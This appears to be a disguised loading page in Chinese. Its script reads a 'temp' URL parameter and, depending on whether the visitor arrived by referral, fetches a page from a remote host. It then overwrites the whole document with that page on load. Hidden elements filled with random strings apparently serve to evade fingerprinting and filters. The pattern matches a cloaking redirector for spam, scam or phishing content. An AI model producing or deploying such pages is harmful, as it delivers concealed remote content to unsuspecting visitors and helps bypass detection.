<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mz28kbQuJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mz28kbQuJ .WkQ07q6d {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mz28kbQuJ .content {
            line-height: 50px;
            text-align: center
        }

        .mz28kbQuJ .img {
            width: 100%
        }

        .mz28kbQuJ .avZO8MvKcbI {
            text-align: center
        }

        .mz28kbQuJ .avZO8MvKcbI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mz28kbQuJ .avZO8MvKcbI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mz28kbQuJ .avZO8MvKcbI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mz28kbQuJ .avZO8MvKcbI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mz28kbQuJ .avZO8MvKcbI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mz28kbQuJ .avZO8MvKcbI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mz28kbQuJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NlYYMWJ4L(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SD3Pwb = NlYYMWJ4L('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SD3Pwb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SD3Pwb +".html?a=share";
		}
		
        m75WwWW=url+"#"+new Date().getTime();
        m75WwWW && function() {
            $.get(m75WwWW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >lTu9gP7L3fz1AHKct8kIo2djrieasywUcry3ioVtNaGsiZ6qhkeUMyyZnGTbHiEnE4MhidX6GqUEUArK4pnBAxN5D</li>
<p  style='display:none'>LxIA71RLJgrbUGLgdLB6Q8xqaXGIpDTA2QhIUn5nBzrpab6XC</p>
<p  style='display:none'>LxIA71RLJgrbUGLgdLB6Q8xqaXGIpDTA2QhIUn5nBzrpab6XC</p>
<b style='display:none' >Gcz8DpL98Lvm7HTSVpvbaWhG45N3KcfCWaDGGeMPQlJ4PKtBZI4umv6wRFLP33R1wyXqFwm80wPPzCmBZyXwNcOlAZGn7Pe</b>
<ul style='display:none' >o7qijpm8p1RrwuJNsNAfFB5KFaiG52snqu6GckULGr5yoUO91a4HckQ4iNeoGdGqHNFMl</ul><div class="mz28kbQuJ">
    <div class="WkQ07q6d">
        <div class="avZO8MvKcbI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>wUTFL2jITeZbRO2nBIYA5ev8hFTdKPdyF7kWAe7zP0HSuMwvGUuFvSuIkH</span>
<a  href='#' style='display:none'>ZGtibB3qe5VBHO6BpQhxspiha4jtQeHSphLLsnUmRcQwpVE7BjVAnF1PWtNR0gCaq093tCcsc6Nfjlkr4xQGr7nT53wdHIQhNoa</a>
<span style='display:none'>wUTFL2jITeZbRO2nBIYA5ev8hFTdKPdyF7kWAe7zP0HSuMwvGUuFvSuIkH</span>
<h1 style='display:none' >aDyVImqrdviWo42qwkiCttZFXghU8ctDlIo6</h1>
<a  href='#' style='display:none'>ZGtibB3qe5VBHO6BpQhxspiha4jtQeHSphLLsnUmRcQwpVE7BjVAnF1PWtNR0gCaq093tCcsc6Nfjlkr4xQGr7nT53wdHIQhNoa</a></body>
</html>